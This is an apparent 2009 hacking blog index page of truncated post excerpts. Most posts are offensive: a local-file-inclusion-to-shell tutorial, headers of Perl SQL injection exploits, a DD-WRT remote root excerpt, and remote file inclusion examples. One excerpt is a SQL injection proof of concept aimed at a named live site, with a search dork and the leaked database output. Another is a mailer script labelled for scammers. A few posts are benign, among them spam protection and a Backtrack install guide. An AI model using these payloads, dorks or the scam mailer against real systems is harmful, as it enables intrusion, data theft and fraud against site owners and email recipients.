Friday, August 28, 2009

Shell via LFI - proc/self/environ method (step by step)

This article is taken from http://h4cky0u.org/shell-via-lfi-proc-self-environ-method-step-by-step--t1101.html , so enjoy it; it is for education only. Thanks to SirGod, contact person: sirgod08[at]gmail[dot]com

1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz

>> 1 - Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code in proc/self/environ. It is a step by step tutorial.

>>...

Wednesday, August 26, 2009

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some less. Even a newly created email account will begin to receive spam just a few days after its creation. Many times we wonder where this spam comes from and why, but the question remains unanswered. So in this post I will try my best to give every possible piece of information about spam and will also tell you how to combat it.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited...

php mailer script for scammer

!-- if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> Your Email: input type="text" name="from" value="" size="30"> Your Name : input type="text" name="realname" value="" size="30"> Reply-To : input type="text" name="replyto" value="" size="30"> Attach File : Subject : input type="text" name="subject" value="" size="65"> Message : <? print $message; ?> To : <? print...

Tuesday, August 25, 2009

How to make a Backtrack 4 Hard Drive Installation

Backtrack 4 does not contain an installer yet, so we wrote this step-by-step guide, based on muts' cookbook, on how to install Backtrack 4 on our hard disk drive.

Step 1 - Creating the partitions

First we will need to create three partitions to be able to install Backtrack on our hard disk drive. We will need boot, swap and root partitions to be created. (We can still create...

Ed Charkow's Supercharged Linking Blind SQL Injection Exploit

#!/usr/bin/perl
#==========================================================================================#
#
# [o] Ed Charkow's Supercharged Linking Blind SQL Injection Exploit
#     Software : Ed Charkow's Supercharged Linking
#     Buy Script : http://www.infodepot3000.com/Scripts/content/supercharged_linking.html
#     Author : NoGe
#     Contact : noge[dot]code[at]gmail[dot]com
#     Blog : http://evilc0de.blogspot.com
#
# [o] Usage
#     root@noge:~# perl link.pl
#
# [x]============================================================[x]
#...

Sunday, August 16, 2009

AJ Auction Pro OOPD 2.x SQL Injection Exploit

#!/usr/bin/perl
#********************************************************#
#                                                        #
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit      #
#     Software : AJ Auction Pro OOPD 2.x                 #
#     Vendor : http://www.ajsquare.com/                  #
#     Author : NoGe                                      #
#     Contact : noge[dot]code[at]gmail[dot]com           #
#     Blog : http://evilc0de.blogspot.com                #
#                                                        #
# [o] Usage ...

BrooWaha Engine 2.0.71 SQL Injection Vuln

[o] BrooWaha Engine 2.0.71 SQL Injection Vulnerability
Software : BrooWaha Engine 2.0.71
Vendor : http://www.broowaha.com/
Author : NoGe

[o] Vulnerable file
image.php

[o] Exploit
http://localhost/[path]/image.php?id==[SQL]

[o] Proof of concept
http://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*

[o] Dork
"Powered by BrooWaha Engine"

[o] Note
If you don't see the result, view the page source and you will see it. :)
The result from the example above will be like this after you view the page source.
4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851
this...

Thursday, August 13, 2009

DD-WRT (httpd service) Remote Command Execution Vulnerability

This article is taken from milw0rm; for more information, see http://www.milw0rm.com/exploits/9209

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists in the latest 24 sp1 version of the firmware. The problem is due to many bugs and bad software design decisions. Here is part of httpd.c:

if (containsstring(file, "cgi-bin")) {

    auth_fail = 0;
    if (!do_auth
        (conn_fp, auth_userid, auth_passwd, auth_realm,
         authorization,...

Sunday, August 9, 2009

Remote File Inclusion

Take a look at the following code:

<?php [...] include($_GET['pag']); [...] ?>

As we can see, $_GET['pag'] is not validated before being used, so a malicious user could include or call (as you prefer to say) his script via the browser and gain access to the machine or view, as before, a file.

Example one: (gain access to the machine)
http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Example two: (view files)
http://remote_host/inc.php?pag=/etc/passwd

Patching

The solution? Validate the input. One of lots of methods to validate inputs...

Saturday, August 8, 2009

MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln

[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability
Software : MAXcms - Databay Content Management System version 3.11.20b
Vendor : http://www.databay.de
Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
Author : NoGe

[o] Vulnerable file

is_projectPath parameter
includes/InstantSite/inc.is_root.php

GLOBALS[thCMS_root] parameter
classes/class.Tree.php
includes/inc.thcms_admin_mediamanager.php
modul/mod.rssreader.php

is_path parameter
classes/class.tasklist.php
classes/class.thcms.php
classes/class.thcms_content.php
classes/class.thcms_modul_parent.php
classes/class.thcms_page.php
classes/class.thcsm_user.php
includes/InstantSite/class.Tree.php

thCMS_root...

Wednesday, August 5, 2009

MySQL: Secure Web Apps - SQL Injection techniques

-[ SUMMARY ]---------------------------------------------------------------------
 0x01: Introduction
 0x02: Injecting SQL
 0x03: Exploiting a Login Form
 0x04: Exploiting Different SQL Statement Type
 0x05: Basic Victim Fingerprinting
 0x06: Standard Blind SQL Injection
 0x07: Double Query
 0x08: Filters Evasion
 0x09: SQL Injection Prevention
 0x10: Conclusion
---------------------------------------------------------------------------------

-[ 0x01: Introduction ]

Hi everybody! I'm here again to write a little,...

milw0rm Javascript Content Parser v3.0

Changes:
* AJAX rendering techniques
* Browser compliance! Designed for Internet Explorer 6 & 7, Firefox, Opera, Seamonkey, Safari
* The code is smaller, I made it too big with useless stuff in 2.0
* The javascript no longer affects the page loading time if the source feed is offline or times out; simply choose when it will load the remote feed by adding update_ModuleX(); anywhere on your page, preferably in the footer.
* PHP proxy (this is optional, see post #2 in this thread)

What is it: This is a simple javascript code which you can copy and...
